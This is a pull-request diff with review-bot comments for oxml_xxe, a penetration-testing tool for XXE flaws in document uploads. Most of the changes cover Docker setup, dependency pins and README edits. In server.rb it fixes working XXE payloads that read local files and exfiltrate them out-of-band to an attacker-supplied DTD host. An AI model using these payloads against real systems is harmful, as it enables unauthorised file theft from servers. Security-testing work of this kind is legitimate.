Merge pull request #42 from nytr0gen/master
Dependency conflicts fix
BuffaloWill authored Mar 26, 2021
2 parents 6fdac34 + 14806bb commit 88b2a68
Showing 15 changed files with 168 additions and 105 deletions.
4 changes: 4 additions & 0 deletions .gitignore
@@ -0,0 +1,4 @@
db
!db/.gitkeep
output
!output/.gitkeep
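Review bot: the `!db/.gitkeep` and `!output/.gitkeep` negations will not take effect as written, because the preceding `db` and `output` patterns exclude the directories themselves, and git cannot re-include a file whose parent directory is excluded. Use `db/*` and `output/*` on the first and third lines so the directory contents are ignored while the `.gitkeep` placeholders can still be negated (an already-tracked `.gitkeep` stays tracked either way, but a fresh clone that recreates the directories would not pick it up).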
16 changes: 16 additions & 0 deletions Dockerfile
@@ -0,0 +1,16 @@
FROM ruby:2.3.8-slim

RUN apt-get update && \
apt-get install -y make git libsqlite3-dev libxslt-dev libxml2-dev zlib1g-dev gcc && \
apt-get clean

WORKDIR /oxml_xxe

# install deps
COPY Gemfile Gemfile.lock ./
RUN bundle install

COPY . .

EXPOSE 4567
CMD ruby server.rb -o 0.0.0.0 -p 4567
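Review bot: the image runs the Sinatra server as root; add a non-root `USER` after `COPY . .` so a bug in the uploaded-document handling cannot write outside `/oxml_xxe/db` and `/oxml_xxe/output`. Three smaller points on the same file: `ruby:2.3.8-slim` is an end-of-life Ruby series that no longer receives security fixes, so the base image should be treated as frozen and moved to a supported tag as soon as the gem pins allow; `apt-get clean` does not remove `/var/lib/apt/lists/*`, so append `rm -rf /var/lib/apt/lists/*` to the same `RUN` line; and with no `.dockerignore`, `COPY . .` bakes whatever is in the host's `db/` and `output/` into the image before the compose volumes shadow them.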
19 changes: 9 additions & 10 deletions Gemfile
@@ -1,12 +1,11 @@
source 'https://rubygems.org'
source "https://rubygems.org"

ruby "2.6.2"
ruby "2.3.8"

# Dependencies at Oct 31, 2017
gem 'sinatra', '1.4.8'
gem 'haml', '5.0.4' # October 13, 2017 - https://rubygems.org/gems/haml/versions
gem 'rubyzip', '1.2.1' # February 08, 2017 - https://rubygems.org/gems/rubyzip/versions
gem 'json','1.8.6'
gem 'nokogiri', '1.8.1' # September 19, 2017 - https://rubygems.org/gems/nokogiri/versions
gem 'data_mapper', '1.2.0'
gem 'dm-sqlite-adapter', '1.2.0'
gem "sinatra", "1.4.8"
gem "haml", "5.0.4"
gem "rubyzip", "1.2.1"
gem "json","1.8.6"
gem "nokogiri", "1.8.1"
gem "data_mapper", "1.2.0"
gem "dm-sqlite-adapter", "1.2.0"
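Review bot: the `ruby "2.3.8"` pin disagrees with the committed `Gemfile.lock`, which records `ruby 2.3.5p376`; regenerate the lockfile inside the `ruby:2.3.8-slim` container so both agree. The rewrite also drops the `# Dependencies at Oct 31, 2017` line and the per-gem release-date comments with their rubygems.org links, which were the only record of why these exact versions were chosen; keep them (or move the explanation to the README) so a future upgrade knows the pins are deliberate rather than accidental.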
97 changes: 97 additions & 0 deletions Gemfile.lock
@@ -0,0 +1,97 @@
GEM
remote: https://rubygems.org/
specs:
addressable (2.7.0)
public_suffix (>= 2.0.2, < 5.0)
bcrypt (3.1.16)
bcrypt-ruby (3.1.5)
bcrypt (>= 3.1.3)
data_mapper (1.2.0)
dm-aggregates (~> 1.2.0)
dm-constraints (~> 1.2.0)
dm-core (~> 1.2.0)
dm-migrations (~> 1.2.0)
dm-serializer (~> 1.2.0)
dm-timestamps (~> 1.2.0)
dm-transactions (~> 1.2.0)
dm-types (~> 1.2.0)
dm-validations (~> 1.2.0)
data_objects (0.10.17)
addressable (~> 2.1)
dm-aggregates (1.2.0)
dm-core (~> 1.2.0)
dm-constraints (1.2.0)
dm-core (~> 1.2.0)
dm-core (1.2.1)
addressable (~> 2.3)
dm-do-adapter (1.2.0)
data_objects (~> 0.10.6)
dm-core (~> 1.2.0)
dm-migrations (1.2.0)
dm-core (~> 1.2.0)
dm-serializer (1.2.2)
dm-core (~> 1.2.0)
fastercsv (~> 1.5)
json (~> 1.6)
json_pure (~> 1.6)
multi_json (~> 1.0)
dm-sqlite-adapter (1.2.0)
dm-do-adapter (~> 1.2.0)
do_sqlite3 (~> 0.10.6)
dm-timestamps (1.2.0)
dm-core (~> 1.2.0)
dm-transactions (1.2.0)
dm-core (~> 1.2.0)
dm-types (1.2.2)
bcrypt-ruby (~> 3.0)
dm-core (~> 1.2.0)
fastercsv (~> 1.5)
json (~> 1.6)
multi_json (~> 1.0)
stringex (~> 1.4)
uuidtools (~> 2.1)
dm-validations (1.2.0)
dm-core (~> 1.2.0)
do_sqlite3 (0.10.17)
data_objects (= 0.10.17)
fastercsv (1.5.5)
haml (5.0.4)
temple (>= 0.8.0)
tilt
json (1.8.6)
json_pure (1.8.6)
mini_portile2 (2.3.0)
multi_json (1.15.0)
nokogiri (1.8.1)
mini_portile2 (~> 2.3.0)
public_suffix (4.0.6)
rack (1.6.13)
rack-protection (1.5.5)
rack
rubyzip (1.2.1)
sinatra (1.4.8)
rack (~> 1.5)
rack-protection (~> 1.4)
tilt (>= 1.3, < 3)
stringex (1.5.1)
temple (0.8.2)
tilt (2.0.10)
uuidtools (2.2.0)

PLATFORMS
ruby

DEPENDENCIES
data_mapper (= 1.2.0)
dm-sqlite-adapter (= 1.2.0)
haml (= 5.0.4)
json (= 1.8.6)
nokogiri (= 1.8.1)
rubyzip (= 1.2.1)
sinatra (= 1.4.8)

RUBY VERSION
ruby 2.3.5p376

BUNDLED WITH
1.16.0
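Review bot: `RUBY VERSION ruby 2.3.5p376` and `BUNDLED WITH 1.16.0` indicate this lockfile was produced on a different machine from the Dockerfile's `ruby:2.3.8-slim`; running `bundle install` in the container and committing the result keeps the lock authoritative for the image that actually ships. Every resolved gem here (`nokogiri 1.8.1`, `rack 1.6.13`, `sinatra 1.4.8`, `json 1.8.6`) dates from 2017 or earlier, so run bundler-audit (`bundle audit`) against this file and record the known advisories in the README as accepted risk for a tool that is only reachable on loopback.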
56 changes: 12 additions & 44 deletions README.md
@@ -1,9 +1,9 @@
# Archived

This project is archived. If someone has a working and _maintained_ fork please let me know and I will point people there. Thank you to all of you. This was a fun project and a technique that yieled (and still yields) interesting research.
This project is archived. If someone has a working and _maintained_ fork please let me know and I will point people there. Thank you to all of you. This was a fun project and a technique that yieled (and still yields) interesting research.

# oxml_xxe
This tool is meant to help test XXE vulnerabilities in ~~OXML document~~ file formats. Currently supported:
This tool is meant to help test XXE vulnerabilities in **OXML document** file formats. Currently supported:

- DOCX/XLSX/PPTX
- ODT/ODG/ODP/ODS
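Review bot: the typo `yieled` in the archived notice survives the edit unchanged; since the line is being rewritten anyway, change it to `yielded`.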
Expand All @@ -13,58 +13,26 @@ This tool is meant to help test XXE vulnerabilities in ~~OXML document~~ file fo
- JPG (experimental)
- GIF (experimental)

BH USA 2015 Presentation:

[Exploiting XXE in File Upload Functionality (Slides)](http://oxmlxxe.github.io/reveal.js/slides.html#/) [(Recorded Webcast)](https://www.blackhat.com/html/webcast/11192015-exploiting-xml-entity-vulnerabilities-in-file-parsing-functionality.html)
BH USA 2015 Presentation: [Exploiting XXE in File Upload Functionality (Slides)](http://oxmlxxe.github.io/reveal.js/slides.html#/) [(Recorded Webcast)](https://www.blackhat.com/html/webcast/11192015-exploiting-xml-entity-vulnerabilities-in-file-parsing-functionality.html)

Blog Posts on the topic:

[Exploiting XXE Vulnerabilities in OXML Documents - Part 1](http://www.silentrobots.com/blog/2015/03/04/oxml_xxe/)

[Exploiting CVE-2016-4264 With OXML_XXE](https://www.silentrobots.com/blog/2016/10/02/exploiting-cve-2016-4264-with-oxml-xxe/)
- [Exploiting XXE Vulnerabilities in OXML Documents](http://www.silentrobots.com/blog/2015/03/04/oxml_xxe/)
- [Exploiting CVE-2016-4264 With OXML_XXE](https://www.silentrobots.com/blog/2016/10/02/exploiting-cve-2016-4264-with-oxml-xxe/)

# Developer Build

OXML_XXE was re-written in Ruby using Sinatra, Bootstrap, and Haml. Installation should be easy:

- You will need a copy of Ruby. RVM is suggested (https://rvm.io/rvm/install). ruby version 2.3.5 is supported.

- If you are running Ubuntu (or also verified on Kali) you will need a couple of dependencies:
```
apt-get install libsqlite3-dev libxslt-dev libxml2-dev zlib1g-dev gcc
```

To install RVM:
```
gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3
\curl -sSL https://get.rvm.io | bash
```
OXML_XXE was re-written in Ruby using Sinatra, Bootstrap, and Haml. Installation should be easy with Docker:

Install Ruby 2.3.5 with RVM
```
rvm install 2.3.5
rvm use 2.3.5
```

Install dependencies and start the server:
```
cd oxml_xxe
gem install bundler
bundle install
ruby server.rb
```

Browse to http://127.0.0.1:4567 to get started.
1. Run `docker-compose up`
2. Browse to http://localhost:4567/ to get started.

# Main Modes

There are two main modes:

## Build a File

Build mode adds a DOCTYPE and inserts the XML Entity into the file of the users choice.
**1. Build a File**

## String Replace in File
Build mode adds a `DOCTYPE` and inserts the XML Entity into the file of the users choice.

String replacement mode goes through and looks for the symbol § in the document. The XML Entity ("&xxe;") replaces any instances of this symbol. Note, you can open the document in and insert § anywhere to have it replaced. The common use case would be a web application which reads in a xlsx and then prints the results to the screen. Exploiting the XXE it would be possible to have the contents printed to the screen.
**2. String Replace in File**

String replacement mode goes through and looks for the symbol `§` in the document. The XML Entity ("&xxe;") replaces any instances of this symbol. Note, you can open the document in and insert `§` anywhere to have it replaced. The common use case would be a web application which reads in a `xlsx` and then prints the results to the screen. Exploiting the XXE it would be possible to have the contents printed to the screen.
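Review bot: two wording problems in the mode descriptions are carried over unchanged: `the file of the users choice` should read `the user's choice`, and `you can open the document in and insert `§`` is missing the name of the application the document is opened in. On the install side, the new Docker instructions no longer say which interface the service listens on; one sentence noting that `docker-compose up` publishes the UI on `127.0.0.1:4567` only (per `docker-compose.yml`) would explain why the tool is not reachable from other hosts and save a trip to the compose file.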
File renamed without changes.
11 changes: 11 additions & 0 deletions docker-compose.yml
@@ -0,0 +1,11 @@
version: "2.2"

services:

web:
build: .
volumes:
- ./db:/oxml_xxe/db
- ./output:/oxml_xxe/output
ports:
- "127.0.0.1:4567:4567"
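Review bot: the `./db` and `./output` bind mounts are written by a container process running as root (the Dockerfile sets no `USER`), so on a Linux host the generated files and the directories themselves end up root-owned and awkward to clean up; either add a non-root user in the Dockerfile or set `user:` on this service. Publishing on `"127.0.0.1:4567:4567"` rather than `"4567:4567"` is the right choice for a tool that serves generated test documents, and deserves a comment in the file so nobody later "fixes" it to bind all interfaces.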
10 changes: 0 additions & 10 deletions docker/Dockerfile

This file was deleted.

14 changes: 0 additions & 14 deletions docker/README.md

This file was deleted.

8 changes: 0 additions & 8 deletions docker/docker-compose.yml

This file was deleted.

File renamed without changes.
File renamed without changes.
27 changes: 13 additions & 14 deletions server.rb
Expand Up @@ -8,7 +8,7 @@
require 'json'

require './lib/util'
require './model/master'
require './lib/model'

if not File.file?('./db/master.db')
puts "|+| Database does not exist, initializing a blank one."
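Review bot: `require './lib/model'` (like the surrounding `require './lib/util'`) resolves against the process's working directory rather than the file's location, so `ruby server.rb` only works when started from the project root; that matches the Dockerfile's `WORKDIR /oxml_xxe`, but `require_relative 'lib/model'` would make the rename safe no matter where the server is launched from.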
Expand All @@ -18,7 +18,6 @@
end

# TODO apply to all xml in docx
# TODO OOB is incorrect
# TODO explain each menu item in help
# TODO soft link content types

Expand All @@ -36,8 +35,8 @@ def read_payloads()
pl["Canary Parameter Entity"] = ['<!DOCTYPE root [<!ENTITY % xxe "test"> %xxe;]>', "A parameter entity check. This is valuable because the entity is checked immediately when the DOCTYPE is parsed. No malicious application but useful to check for."]
pl["Plain External Parameter Entity"] = ['<!DOCTYPE root [<!ENTITY % a SYSTEM "FILE"> %a;]>', "A simple external parameter entity. Note, the file is the value for the payload; IP and PROTOCOL are ignored by OXML XXE. Useful because the entity is checked immediately when the DOCTYPE is parsed. "]
pl["Recursive Parameter Entity"] = ['<!DOCTYPE root [<!ENTITY % a "PARAMETER"> <!ENTITY % b "RECURSIVE %a;"> %b;]>',"Technically recursive parameter entities are not allowed by the XML spec. Should never work. Precursor to the billion laughs attack."]
pl["Out of Bounds Attack (using file://)"] = ['<!DOCTYPE root [<!ENTITY % file SYSTEM "file://FILE"><!ENTITY % dtd SYSTEM "IP">%a;]>',"OOB is a useful technique to exfiltrate files when attacking blind. This is accomplished by leveraging the file:// protocol. See References."]
pl["Out of Bounds Attack (using php://filter)"] = ['<!DOCTYPE root [<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=FILE"><!ENTITY % dtd SYSTEM "IP">%a;]>',"OOB is a useful technique to exfiltrate files when attacking blind. This is accomplished by leveraging the php filter \"convert.base64-encode\", which has been available since PHP 5.0.0. See References."]
pl["Out of Bounds Attack (using file://)"] = ['<!DOCTYPE root [<!ENTITY % file SYSTEM "file://FILE"><!ENTITY % dtd SYSTEM "IP">%dtd;]>',"OOB is a useful technique to exfiltrate files when attacking blind. This is accomplished by leveraging the file:// protocol. Details about building the dtd file at https://portswigger.net/web-security/xxe/blind."]
pl["Out of Bounds Attack (using php://filter)"] = ['<!DOCTYPE root [<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=FILE"><!ENTITY % dtd SYSTEM "IP">%dtd;]>',"OOB is a useful technique to exfiltrate files when attacking blind. This is accomplished by leveraging the php filter \"convert.base64-encode\", which has been available since PHP 5.0.0. See References."]
return pl
end

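Review bot: the change from `%a;` to `%dtd;` in both Out of Bounds payloads is the real fix in this file: the old strings referenced a parameter entity that was never declared, so the external DTD named by `IP` was never loaded, which is what the removed `# TODO OOB is incorrect` was tracking. The two descriptions are now inconsistent, though: the `file://` variant links the PortSwigger blind-XXE page while the `php://filter` variant still says `See References`; use the same reference in both. The `IP` placeholder is also substituted into a `SYSTEM` literal, so the description should say that a full URL is expected there, not a bare address.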
Expand All @@ -64,7 +63,7 @@ def oxml_file_defaults()
@types = settings.types
@payloads = settings.payloads
@protos = settings.protocols
haml :build, :encode_html => true
haml :build
end

post '/build' do
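Review bot: `:encode_html` is not a Haml option (the Haml 5 escaping switch is `:escape_html`), so dropping it from every `haml` call in this file changes nothing at runtime, but it also shows that output escaping was never actually enabled for these views. Payload descriptions, stored file names and `/display_file` output are rendered by these templates, so either set `set :haml, :escape_html => true` once in the Sinatra configuration or verify that every `=` in the views that prints user-supplied data is `&=`; otherwise the UI is exposed to markup carried in the files it lists. The same remark applies to each of the identical `haml :name` hunks below.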
Expand Down Expand Up @@ -114,7 +113,7 @@ def oxml_file_defaults()
@types = settings.types
@payloads = settings.payloads
@protos = settings.protocols
haml :replace, :encode_html => true
haml :replace
end

post '/replace' do
Expand Down Expand Up @@ -158,7 +157,7 @@ def oxml_file_defaults()
end

get '/xss' do
haml :xss, :encode_html => true
haml :xss
end

post '/xss' do
Expand Down Expand Up @@ -201,7 +200,7 @@ def oxml_file_defaults()
@types = settings.poc_types
@protos = settings.protocols

haml :poc, :encode_html => true
haml :poc
end

post '/poc' do
Expand Down Expand Up @@ -232,9 +231,9 @@ def oxml_file_defaults()
end

get '/list' do
@files = Oxfile.all()
@files = Oxfile.all(:order => :id.desc)

haml :list, :encode_html => true
haml :list
end

get '/download' do
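Review bot: `Oxfile.all(:order => :id.desc)` passes a bare `:id.desc` operator where the DataMapper documentation shows the array form `:order => [:id.desc]`; confirm dm-core 1.2.1 accepts the bare value, or use the documented array form, which also makes adding a second sort key later trivial. Listing newest-first is a good change for the `/list` page.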
Expand All @@ -245,7 +244,7 @@ def oxml_file_defaults()
end

get '/display' do
haml :display, :encode_html => true
haml :display
end

post '/display_file' do
Expand All @@ -260,7 +259,7 @@ def oxml_file_defaults()
File.open(rand_file, 'wb') {|f| f.write(input_file) }

@files = display_file(rand_file)
haml :display_file, :encode_html => true
haml :display_file
end

get '/view_file' do
Expand All @@ -272,7 +271,7 @@ def oxml_file_defaults()
rand_file = file.location

@files = display_file(rand_file)
haml :display_file, :encode_html => true
haml :display_file
end

get '/delete' do
Expand All @@ -291,7 +290,7 @@ def oxml_file_defaults()
end

get '/overwrite' do
haml :overwrite, :encode_html => true
haml :overwrite
end

post '/overwrite' do
Expand Down